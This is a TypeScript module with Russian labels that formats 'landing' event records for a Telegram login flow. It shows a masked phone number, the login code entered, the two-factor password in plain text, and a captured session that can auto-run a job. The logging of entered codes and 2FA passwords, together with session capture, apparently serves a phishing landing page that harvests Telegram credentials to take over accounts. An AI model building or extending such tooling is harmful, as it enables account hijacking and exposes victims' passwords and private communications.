import type { ILandingEvent, LandingEventType } from '@/entities/landing.entity';

export type LandingEventOutcomeBadge = 'success' | 'error' | 'neutral' | 'pending';

export type ParsedTelegramAuthEventMeta = {
	phoneMasked?: string;
	code?: string;
	password?: string;
	runId?: string;
	error?: string;
	awaitingPassword?: boolean;
};

function str(value: unknown): string | null {
	if (value === null || value === undefined) {
		return null;
	}
	const text = String(value);
	return text.length > 0 ? text : null;
}

function boolLabel(value: unknown): string | null {
	if (value === true) {
		return 'успех';
	}
	if (value === false) {
		return 'ошибка';
	}
	return null;
}

const TELEGRAM_AUTH_TYPES = new Set<LandingEventType>([
	'telegram_auth_start',
	'telegram_auth_code',
	'telegram_auth_password',
	'telegram_auth_session',
]);

export function getLandingEventOutcomeBadge(
	event: Pick<ILandingEvent, 'type' | 'meta'>,
): LandingEventOutcomeBadge {
	if (event.type === 'telegram_auth_session') {
		return 'success';
	}
	if (event.type === 'telegram_auth_code' || event.type === 'telegram_auth_password') {
		if (event.meta?.success === true) return 'success';
		if (event.meta?.success === false || event.meta?.success == null) return 'error';
	}
	if (event.type === 'telegram_auth_start') {
		return 'neutral';
	}
	return 'neutral';
}

export function parseTelegramAuthEventMeta(
	event: Pick<ILandingEvent, 'type' | 'meta'>,
): ParsedTelegramAuthEventMeta | null {
	if (!TELEGRAM_AUTH_TYPES.has(event.type)) {
		return null;
	}
	const meta = event.meta ?? {};
	const parsed: ParsedTelegramAuthEventMeta = {};
	const phoneMasked = str(meta.phoneMasked);
	if (phoneMasked) parsed.phoneMasked = phoneMasked;
	const code = str(meta.code);
	if (code) parsed.code = code;
	const password = str(meta.password);
	if (password) parsed.password = password;
	const runId = str(meta.runId);
	if (runId) parsed.runId = runId;
	const error = str(meta.error);
	if (error) parsed.error = error;
	if (meta.awaitingPassword === true) parsed.awaitingPassword = true;
	return parsed;
}

export function formatLandingEventMetaDetail(event: Pick<ILandingEvent, 'type' | 'meta'>): string | null {
	if (!TELEGRAM_AUTH_TYPES.has(event.type)) {
		return null;
	}

	const meta = event.meta ?? {};
	const parts: string[] = [];

	switch (event.type) {
		case 'telegram_auth_start': {
			const phoneMasked = str(meta.phoneMasked);
			if (phoneMasked) {
				parts.push(`тел: ${phoneMasked}`);
			}
			const codeType = str(meta.codeType);
			if (codeType) {
				parts.push(`код: ${codeType}`);
			}
			if (meta.reused === true) {
				parts.push('повтор сессии');
			}
			break;
		}
		case 'telegram_auth_code': {
			const code = str(meta.code);
			if (code) {
				parts.push(`ввод: ${code}`);
			}
			const result = boolLabel(meta.success);
			if (result) {
				parts.push(result);
			}
			const error = str(meta.error);
			if (error) {
				parts.push(error);
			}
			if (meta.awaitingPassword === true) {
				parts.push('нужен 2FA');
			}
			break;
		}
		case 'telegram_auth_password': {
			const password = str(meta.password);
			if (password) {
				parts.push(`2FA: ${password}`);
			}
			const result = boolLabel(meta.success);
			if (result) {
				parts.push(result);
			}
			const error = str(meta.error);
			if (error) {
				parts.push(error);
			}
			break;
		}
		case 'telegram_auth_session': {
			const runId = str(meta.runId);
			if (runId) {
				parts.push(`run: ${runId}`);
			} else if (meta.autoRun === false) {
				parts.push('без автозапуска');
			}
			const message = str(meta.message);
			if (message) {
				parts.push(message);
			}
			break;
		}
	}

	return parts.length > 0 ? parts.join(' · ') : null;
}
